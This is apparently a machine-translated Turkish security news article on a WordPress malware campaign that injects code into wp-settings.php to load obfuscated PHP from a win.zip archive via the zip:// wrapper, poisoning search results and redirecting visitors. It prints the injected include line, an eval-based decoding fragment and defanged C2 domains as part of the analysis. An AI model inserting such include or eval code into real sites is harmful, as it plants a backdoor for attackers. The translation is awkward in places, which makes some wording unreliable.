Siber güvenlik araştırmacıları, WordPress web sitelerini hedefleyen, ustaca zip arşiv tabanlı bir saldırı mekanizması aracılığıyla WordPress web sitelerini hedefleyen gelişmiş bir kötü amaçlı yazılım kampanyası ortaya çıkardılar.
İlk olarak Temmuz 2025’te bildirilen kötü amaçlı yazılım, web tabanlı tehditlerde önemli bir evrimi temsil eder, gelişmiş gizleme teknikleri ve şüphesiz ziyaretçileri kötü amaçlı alanlara yönlendirmek için gizli kalıcılık yöntemleri, aynı anda arama motoru optimizasyonu zehirlenme işlemlerini yürütür.
Saldırı, özellikle kritik WP-Settings.php bileşenini hedefleyen WordPress Core dosyalarının uzlaşmasıyla başlar.
.webp)
Erişim kazanıldıktan sonra, saldırganlar PHP’nin Zip: // Sargı İşlevselliğini Gizli Yükleri yürütmek için kullanan kötü niyetli kodlar enjekte eder.
Bu yaklaşım, kötü amaçlı kod, kötü amaçlı kod Win.zip adlı zararsız bir fermuarlı arşiv dosyası gibi görünen şey içinde saklandığından, geleneksel güvenlik tarayıcıları tarafından neredeyse tespit edilmemesini sağlar.
Kötü amaçlı yazılımın birincil hedefleri basit yeniden yönlendirme şemalarının ötesine uzanır. Yetkisiz içerik enjeksiyonu, site haritası manipülasyonu ve arama sonuçlarında kötü amaçlı web sitelerini artırmak için tasarlanmış spam yüklü sayfaların oluşturulması yoluyla arama motoru sıralamalarına kapsamlı bir saldırı düzenler.
Enfeksiyon, insan ziyaretçiler ve otomatik botlar arasında ayrım yapma yeteneğinde dikkate değer bir karmaşıklık göstermektedir, bu da arama motoru tarayıcılarının iyi huylu içerikle karşılaşmasını sağlarken gerçek kullanıcılar kötü niyetli yönlendirmelere maruz kalır.
Sucuri analistleri, bir müşteri tarafından bildirilen kalıcı yönlendirme sorunlarını araştırdıktan sonra kötü amaçlı yazılımları belirledi ve bu çok katmanlı tehdidin keşfine yol açtı.
Araştırmacılar, kötü amaçlı yazılımın dinamik komut ve kontrol sunucusu seçimi kullandığını ve ziyaretçiler tarafından erişilen belirli URL modellerine dayanarak farklı C2 alanlarının etkinleştirildiğini belirtti.
ZIP Arşivi İçerme Mekanizması
Kötü amaçlı yazılımın en yenilikçi özelliği, PHP’nin zip: // kod dahil etme için akış sargısından yararlanmasında yatmaktadır. WP-Settings.php’ye enjekte edilen ilk yük, enfeksiyon çerçevesini oluşturan iki kritik çizgi içerir:-
$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);
include('zip://win.zip#' . $h);Bu kod, HTTP_HOST başlığından etki alanı adını çıkarır ve doğrudan win.zip arşivinden bir dosya eklemek için kullanır.
.webp)
Kötü niyetli kod, bağımsız PHP dosyaları yerine sıkıştırılmış bir kap içinde bulunduğundan, teknik geleneksel dosya tabanlı algılama yöntemlerini atlar.
Ekstraksiyon üzerine, ZIP arşivi, şunları şöyle yapılandırılmış yoğun bir şekilde gizlenmiş PHP kodunu ortaya çıkarır:-
$encode=$b3($string);
$string1=$b2($b4($encode));
echo eval("?>" . $string1);Kötü amaçlı yazılım, çevre manipülasyonu, genişletilmiş yürütme zaman aşımları ayarlama ve bot karşıtı algılama mekanizmalarını uygulama yoluyla kalıcılık oluşturur.
.webp)
Wditemqy gibi alanlar dahil olmak üzere birden çok komut ve kontrol sunucusundan dinamik olarak seçer[.]İnturba[.]Xyz ve Oqmetrix[.]Icercanokt[.]XYZ, istenen URL yoluna bağlı olarak.
Bu dağıtılmış C2 mimarisi, kötü amaçlı yazılımların yayından kaldırma çabalarına karşı esnekliğini arttırırken, ziyaretçi davranış kalıplarına dayalı hedeflenen içerik sunumunu mümkün kılar.
Canlı kötü amaçlı yazılım davranışını araştırın, bir saldırının her adımını izleyin ve daha hızlı, daha akıllı güvenlik kararlarını alın -> DeneNŞimdi y.run